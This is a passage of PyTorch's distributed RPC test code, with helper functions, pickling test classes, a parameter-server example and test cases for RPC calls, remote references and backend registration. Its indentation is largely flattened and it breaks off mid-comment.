def get_worker_infos(self):
return {
WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# The classes and functions below are used to test Python user-defined
# functions, classes, and methods over RPC.
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_sparse_tensor(coalesce=False):
i = [[0, 1, 1], [2, 0, 2]]
v = [3, 4, 5]
tensor = torch.sparse_coo_tensor(i, v, (2, 3))
if coalesce:
tensor = tensor.coalesce()
return tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_container_sum(a):
result = a[0]
for tensor in a[1:]:
result += tensor
return result
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def identity(a):
return a
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def nested_rpc_sparse(dst):
return rpc.rpc_sync(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
)
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_rref_sparse(dst):
return (
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def nested_remote_sparse(dst):
rref = rpc.remote(dst, torch.add, args=(build_sparse_tensor(), build_sparse_tensor()))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
def heavy_rpc_sparse(tensor):
for i in range(1, 100):
tensor *= i
tensor = tensor / (i + 1)
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
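# A possible shape for the TODO above (an untested sketch, not part of the
# test suite): torch.futures.collect_all returns a Future that completes once
# every input future is done, which removes the manual lock/counter bookkeeping.
@rpc.functions.async_execution
def async_add_multi_fanout_collected(to, x, num, step):
    futs = [
        rpc.rpc_async(to, torch.add, args=(x if i == 0 else 0, step))
        for i in range(num)
    ]
    # Sum the result of every fanned-out RPC once all of them have completed.
    return torch.futures.collect_all(futs).then(
        lambda all_futs: sum(fut.wait() for fut in all_futs.wait())
    )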
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock", "event")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
self.event = torch.cuda.Event(enable_timing=True)
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
self.event.record()
return self.tensor.sum()
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class MyEmbeddingBagModel(torch.nn.Module):
def __init__(self, sparse):
super().__init__()
self.eb = torch.nn.EmbeddingBag(
10,
10,
sparse=sparse
)
def forward(self, x):
return self.eb(x)
class MyParameterServer:
def __init__(self, trainers):
self.lock = Lock()
self.trainers = trainers
self.iteration = 0
self.updates = 0
self.futures = []
self.total = None
self.gradient = None
@staticmethod
def get_gradient(rref):
return rref.local_value().gradient
@staticmethod
@rpc.functions.async_execution
def average(rref, riteration, tensor):
self = rref.local_value()
fut = torch.futures.Future()
with self.lock:
if riteration > self.iteration:
self.iteration = riteration
self.updates = 0
self.futures.clear()
self.futures.append(fut)
if self.total is None:
self.total = tensor
else:
self.total += tensor
self.updates += 1
if self.trainers == self.updates:
self.gradient = self.total / float(self.trainers)
for fut in self.futures:
result = self.total / float(self.trainers)
fut.set_result(result)
return fut
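# Illustrative trainer-side helper (an assumption about how average() above is
# meant to be driven; the real _trainer_func used by the tests is defined
# elsewhere): each trainer pushes its local gradient to the worker that owns
# ps_rref and blocks until every trainer for that iteration has reported in.
def example_push_gradient(ps_rref, iteration, local_gradient):
    return rpc.rpc_sync(
        ps_rref.owner(),
        MyParameterServer.average,
        args=(ps_rref, iteration, local_gradient),
    )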
class RpcTestCommon():
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _self_py_udf_remote(self, worker_info, x, y, z):
rref = rpc.remote(worker_info, my_function, args=(x, y, z))
self.assertEqual(rref.to_here(), x + y + z)
def _self_remote_rref_as_rpc_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, x))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, x + y))
self.assertEqual(ret, x + y + z + x + y)
self.assertEqual(fut.wait(), x + y + z + x)
def _self_remote_rref_as_remote_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, x))
self.assertEqual(
ret_rref.to_here(), x + y + z + x
)
def _world_size_one(self, a, b):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
def _rpc_sync(x, y):
expect = x * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(x, y)
)
self.assertEqual(expect, result)
def _rpc_async(x, y):
expect = x * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(x, y)
).wait()
self.assertEqual(expect, result)
def _remote(x, y):
expect = x * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(x, y)
).to_here()
self.assertEqual(expect, result)
_rpc_sync(a, b)
_rpc_async(a, b)
_remote(a, b)
rpc.shutdown()
def _multi_rpc(self, sparse):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
if sparse:
x = build_sparse_tensor() * n
y = build_sparse_tensor() * n
else:
x = torch.ones(2, 2)
y = torch.ones(2, 2)
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(ret, x * 2)
def _wait_all_workers(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
        # worker0 calls this at the end after waiting for RPC responses.
        # worker1/2 call this immediately and still have some work after it.
        # worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def _wait_all_workers_twice(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
        # worker0 calls this at the end after waiting for RPC responses.
        # worker1/2 call this immediately and still have some work after it.
        # worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def _nested_rpc(self, f, expected):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
f,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, expected)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
def _builtin_remote_ret(self, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.to_here(), expected)
def _builtin_remote_self(self, x, y, expected):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.local_value(), expected)
def _test_multi_remote_call(self, fn, sparse, args_fn=lambda x, y: (), kwargs_fn=lambda x, y: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n, sparse),
kwargs=kwargs_fn(n, sparse),
)
)
expected.append(fn(*args_fn(n, sparse), **kwargs_fn(n, sparse)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
def _py_rref_args(self, a, b, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(a, b)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(x, y)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
def _py_rref_args_user_share(self, a, b, c, x, y, z, expected):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(x, y, z)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
def _py_rpc_rref_args(self, a, b, c, x, y, z, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(x, y, z)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, expected)
def _nested_remote(self, f, expected):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), expected)
def _nested_rref(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
def _nested_rref_stress(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
def _my_parameter_server(self, sparse):
ps_rref = RRef(MyParameterServer(self.world_size - 1))
futures = []
for index in range(1, self.world_size):
futures.append(
rpc.rpc_async(
worker_name((self.rank + index) % self.world_size),
self._trainer_func,
args=(
ps_rref,
sparse
),
)
)
torch.futures.wait_all(futures)
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
# We check proper CUDA stream synchronization by adding to the tensor
# in one stream to get the expected value, and reading it from another stream.
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
if sparse_tensor:
tensor = build_sparse_tensor().to("cuda:0")
add_tensor = build_sparse_tensor().to("cuda:0")
expected_tensor = (tensor + add_tensor).coalesce()
else:
tensor = torch.zeros((100,), device="cuda:0")
add_tensor = torch.ones((100,), device="cuda:0")
expected_tensor = tensor + add_tensor
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor += add_tensor
if sparse_tensor:
tensor = tensor.coalesce()
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
tensor = unwrapper(future.wait())
if sparse_tensor:
self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
self.assertEqual(tensor.size(), expected_tensor.size())
else:
self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
class RpcTest(RpcAgentTestFixture, RpcTestCommon):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
# Test dense tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist().wait()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
